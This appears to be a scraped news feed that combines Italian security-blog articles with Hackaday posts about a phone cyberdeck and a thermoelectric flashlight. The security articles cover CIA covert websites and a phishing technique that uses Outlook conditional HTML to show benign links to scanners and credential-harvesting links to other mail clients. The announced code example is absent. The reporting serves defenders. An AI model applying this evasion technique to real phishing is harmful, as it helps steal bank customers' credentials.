Uno dei siti creati dalla CIA era starwarsweb.net, un falso sito di fan di Star Wars. A prima vista, la risorsa sembra un tipico sito web degli anni 2010: pubblicizzava un set Lego Star Wars per coloro che “vogliono diventare uno Jedi”, così come giochi che potrebbero piacere ai visitatori: Star Wars Battlefront 2 per Xbox; Star Wars: Il potere della Forza II per Xbox 360 e Star Wars the Clone Wars: Republic Heroes per Nintendo Wii.
Secondo Santilli, il sito era in realtà uno strumento della CIA per comunicare segretamente con i suoi informatori in altri Paesi. Inoltre, il sito faceva parte di una vasta rete di risorse simili, individuate dalle autorità iraniane più di dieci anni fa.
Il ricercatore ha trovato anche altri siti probabilmente collegati alla CIA. Tra questi ci sono siti dedicati agli sport estremi, alla musica brasiliana e un sito di fan di un famoso comico. Alcune di queste risorse, in base alla lingua e al contenuto, erano orientate verso Germania, Francia, Spagna e Brasile.
“Questo ci ha permesso di scoprire molti più siti e di acquisire una comprensione più ampia degli interessi della CIA , inclusi specifici paesi democratici che erano considerati obiettivi e non erano stati menzionati in precedenza. Fornisce anche un’idea statistica di quanta importanza attribuissero alle diverse aree all’epoca, e non sorprende che il Medio Oriente fosse in cima alla lista”, afferma Santilli.
I giornalisti di 404 Media ricordano che nel novembre 2018 Yahoo News pubblicò un’indagine su larga scala sui canali di comunicazione segreti della CIA e su come furono svelati. Poi la rivelazione avvenne in Iran, dopo la quale più di due dozzine di fonti della CIA morirono in Cina nel 2011 e nel 2012. Alla fine, la CIA fu costretta a smettere di usare questi strumenti di comunicazione segreti.
Nel settembre 2022, la Reuters ha pubblicato la propria inchiesta dal titolo “Spie americane abbandonate“. Questo articolo, ad esempio, descrive come un informatore della CIA in Iran, di nome Gholamreza Hosseini, sia stato smascherato dalle autorità iraniane a causa dei siti web segreti poco affidabili della CIA.
In particolare, uno degli errori della CIA è stato quello di aver inserito indirizzi IP sequenziali che puntavano ai siti: questo significa che, scoprendone uno, i ricercatori avrebbero potuto facilmente scoprire anche gli altri.
L’articolo della Reuters riportava che digitare una password nella barra di ricerca di siti web apparentemente normali in realtà attivava un processo di accesso, consentendo alle fonti di comunicare con la CIA. L’articolo menzionava due domini e descriveva nove siti. Utilizzando i dati di questo articolo, Santilli è riuscito a trovare molte risorse simili.
L'articolo Fan di Star Wars o spie della CIA? Ecco cosa ha scoperto un ricercatore brasiliano proviene da il blog della sicurezza informatica.
Phishing Invisibile in Microsoft Outlook: La Trappola Perfetta Elude Anche i Sistemi di Sicurezza!
Sans Tech segnala una sofisticata tecnica di phishing che sfrutta le capacità di rendering HTML di Microsoft Outlook per nascondere link dannosi ai sistemi di sicurezza aziendali, mantenendone l’efficacia contro gli utenti finali.
L’attacco sfrutta istruzioni HTML condizionali per visualizzare contenuti diversi a seconda che l’e-mail venga visualizzata in Outlook o in client di posta elettronica alternativi, consentendo agli autori della minaccia di aggirare i meccanismi di scansione di sicurezza comunemente implementati negli ambienti aziendali.
Gli analisti della sicurezza hanno osservato che questa tecnica viene utilizzata principalmente contro gli istituti finanziari, con gli aggressori che creano e-mail che sembrano provenire da importanti banche e richiedono la verifica del conto.
La natura sofisticata di questi attacchi suggerisce che siano opera di esperti in minacce informatiche che conoscono le sfumature tecniche dei motori di rendering dei client di posta elettronica e delle architetture di sicurezza aziendale.
Queste istruzioni, e , sono state originariamente create per garantire la corretta formattazione delle e-mail su diversi client, ma ora sono state utilizzate come armi dai criminali informatici. Quando un’e-mail contenente queste istruzioni condizionali viene aperta in Microsoft Outlook, viene eseguito il codice condizionale MSO (Microsoft Office), che visualizza contenuto innocuo che appare legittimo sia agli utenti sia ai sistemi di sicurezza automatizzati.
La tecnica funziona creando due percorsi di codice distinti all’interno di un singolo messaggio di posta elettronica. Il primo percorso indirizza gli utenti di Outlook con link apparentemente legittimi, mentre il secondo indirizza gli utenti di altri client di posta elettronica a siti web di raccolta di credenziali.
Questo approccio a doppia funzionalità consente agli aggressori di mantenere un’apparenza di legittimità quando le e-mail vengono elaborate dall’infrastruttura di sicurezza aziendale, che si basa prevalentemente su meccanismi di scansione basati su Outlook.
L’implementazione dannosa prevede l’incorporamento di blocchi HTML condizionali che eseguono diverse destinazioni di collegamento ipertestuale in base all’identificazione del client di posta elettronica. La struttura del codice segue questo schema:
Questa struttura del codice garantisce che gli utenti di Outlook vedano riferimenti a domini bancari legittimi, mentre gli utenti di Apple Mail, Thunderbird, dell’interfaccia web di Gmail e di altri client non Outlook vengono reindirizzati a infrastrutture controllate dagli aggressori.
La scoperta di questa tecnica evidenzia significative debolezze nelle architetture di sicurezza della posta elettronica aziendale La maggior parte delle soluzioni di sicurezza aziendale analizzano le e-mail utilizzando motori compatibili con Outlook, il che significa che elaborano solo il ramo condizionale benigno e non riescono a rilevare il percorso alternativo dannoso.
L'articolo Phishing Invisibile in Microsoft Outlook: La Trappola Perfetta Elude Anche i Sistemi di Sicurezza! proviene da il blog della sicurezza informatica.
SPACEdeck is Half Cyberdeck, Half Phone Case, All Style
It’s been at least a few hours since Hackaday last featured a cyberdeck, so to avoid the specter of withdrawal, we present you with [Sp4m]’s SPACEdeck, a stylish phone-based cyberdeck!
The SPACEdeck takes a Samsung Galaxy S24 and puts it into a handsome clamshell case with a wireless keyboard, turning the phone into a tiny-screened laptop that urges you not to panic. Is The Hitchiker’s Guide to The Galaxy available on the Playstore? Well, the e-book of the novel surely is, and having access to Wikipedia comes close. The design is building off (or out from, as the case may be) a 3D-printed phone case for the S24 by Digital Proto.
Given that the Galaxy S24 has more horsepower than the ancient Macbook we’re writing this on, this setup is probably going to be more useful than you might think, especially when paired with Termux to give you the full power of Linux.
Like some modern laptops, the screen can rotate 180 degrees for when the keyboard isn’t needed. The case will also allow for Nintendo Switch2 joycon integration, but that’s a work in progress for now. The connection points will also be modular so other accessories can be used. All files will be released once [Sp4m] is happy with how the Joycons are holding on, hopefully with a license that will allow us to remix this for other phones.
Given the supercomputers in our pockets, it’s really a wonder we don’t see more android-based cyberdecks, but most seem to stick to SBCs. Lately it seems the slabtop form-factor has been equally popular for cyberdecks, but it’s hard to beat a clamshell for practicality.
A Flashlight of Fire and Ice
[Daniel Salião Ferreira] may or may not be a Game of Thrones fan, but he does have a fun demo of the Seebeck effect in the form of a flashlight powered by fire and ice. The basic idea is to use a thermocouple, but — in this case — he uses a Peltier effect cooler.
The Peltier and Seebeck effects are two sides of the same coin: the Peltier effect creates heating and cooling when current flows through a thermoelectric material. In contrast, the Seebeck effect generates a voltage when there is a temperature gradient. While thermocouples do produce voltage this way, they usually have much lower power output and are useless as heat pumps.
Thermoelectric heat pumps — Peltier devices — use semiconductors, which allow them to reach higher temperature differences when used as a heat pump, and also perform better than a conventional metal thermocouple in reverse operation.
Generating power from waste heat is nothing new. Is it harder to do this with thermocouples? Yes. Yes, it is.
youtube.com/embed/q7bYLyQC27g?…